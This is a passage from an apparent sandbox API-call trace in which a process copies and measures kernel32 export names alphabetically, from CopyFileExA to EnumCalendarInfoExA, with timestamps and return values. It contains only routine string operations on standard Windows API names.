lpString1="CopyFileExA") returned="CopyFileExA" [0076.828] lstrlenA (lpString="COPYFILEEXA") returned 11 [0076.828] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0076.828] lstrlenA (lpString="COPYFILEEXW") returned 11 [0076.828] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0076.828] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0076.828] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0076.828] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0076.828] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0076.828] lstrlenA (lpString="COPYFILEW") returned 9 [0076.828] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0076.828] lstrlenA (lpString="COPYLZFILE") returned 10 [0076.828] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0076.828] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0076.828] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0076.828] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0076.828] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0076.828] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0076.828] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0076.828] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0076.828] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0076.828] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0076.828] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0076.828] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0076.829] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0076.829] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0076.829] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0076.829] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0076.829] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0076.829] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0076.829] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0076.829] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0076.829] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0076.829] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0076.829] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0076.829] lstrlenA (lpString="CREATEEVENTA") returned 12 [0076.829] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0076.829] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0076.829] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0076.829] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0076.829] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0076.829] lstrlenA (lpString="CREATEEVENTW") returned 12 [0076.829] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0076.829] lstrlenA (lpString="CREATEFIBER") returned 11 [0076.829] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0076.829] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0076.829] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0076.829] lstrlenA (lpString="CREATEFILEA") returned 11 [0076.829] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0076.829] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0076.829] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0076.829] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0076.829] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0076.829] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0076.829] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0076.829] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0076.829] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0076.829] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0076.830] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0076.830] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0076.830] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0076.830] lstrlenA (lpString="CREATEFILEW") returned 11 [0076.830] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0076.830] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0076.830] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0076.830] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0076.830] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0076.830] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0076.830] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0076.830] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0076.830] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0076.830] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0076.830] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0076.830] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0076.830] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0076.830] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0076.830] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0076.830] lstrlenA (lpString="CREATEJOBSET") returned 12 [0076.830] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0076.830] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0076.830] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0076.830] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0076.830] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0076.830] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0076.830] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0076.830] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0076.830] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0076.830] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0076.830] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0076.830] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0076.830] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0076.830] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0076.830] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0076.830] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0076.830] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0076.831] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0076.831] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0076.831] lstrlenA (lpString="CREATEPIPE") returned 10 [0076.831] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0076.831] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0076.831] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0076.831] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0076.831] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0076.831] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0076.831] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0076.831] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0076.831] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0076.831] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0076.831] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0076.831] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0076.831] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0076.831] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0076.831] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0076.831] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0076.831] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0076.831] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0076.831] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0076.831] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0076.831] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0076.831] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0076.831] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0076.831] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0076.831] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0076.831] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0076.831] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0076.831] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0076.831] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0076.831] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0076.831] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0076.831] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0076.831] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0076.832] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0076.832] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0076.832] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0076.832] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0076.832] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0076.832] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0076.832] lstrlenA (lpString="CREATETHREAD") returned 12 [0076.832] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0076.832] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0076.832] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0076.832] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0076.832] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0076.832] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0076.832] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0076.832] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0076.832] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0076.832] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0076.832] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0076.832] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0076.832] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0076.832] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0076.832] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0076.832] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0076.832] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0076.832] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0076.832] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0076.832] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0076.832] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0076.832] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0076.832] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0076.832] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0076.832] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0076.832] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0076.832] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0076.833] lstrlenA (lpString="CTRLROUTINE") returned 11 [0076.833] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0076.833] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0076.833] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0076.833] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0076.833] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0076.833] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0076.833] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0076.833] lstrlenA (lpString="DEBUGBREAK") returned 10 [0076.833] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0076.833] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0076.833] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0076.833] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0076.833] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0076.833] lstrlenA (lpString="DECODEPOINTER") returned 13 [0076.833] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0076.833] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0076.833] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0076.833] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0076.833] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0076.833] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0076.833] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0076.833] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0076.833] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0076.833] lstrlenA (lpString="DELETEATOM") returned 10 [0076.833] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0076.833] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0076.833] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0076.833] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0076.833] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0076.833] lstrlenA (lpString="DELETEFIBER") returned 11 [0076.833] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0076.833] lstrlenA (lpString="DELETEFILEA") returned 11 [0076.833] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0076.833] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0076.833] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0076.833] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0076.834] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0076.834] lstrlenA (lpString="DELETEFILEW") returned 11 [0076.834] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0076.834] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0076.834] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0076.834] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0076.834] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0076.834] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0076.834] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0076.834] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0076.834] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0076.834] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0076.834] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0076.834] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0076.834] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0076.834] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0076.834] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0076.834] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0076.834] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0076.834] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0076.834] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0076.834] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0076.834] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0076.834] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0076.834] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0076.834] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0076.834] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0076.834] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0076.834] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0076.834] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0076.834] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0076.834] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0076.834] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0076.834] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0076.834] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0076.834] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0076.834] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0076.835] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0076.835] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0076.835] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0076.835] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0076.835] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0076.835] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0076.835] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0076.835] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0076.835] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0076.835] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0076.835] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0076.835] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0076.835] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0076.835] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0076.835] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0076.835] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0076.835] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0076.835] lstrcpyA (in: lpString1=0x3f2c7fc, 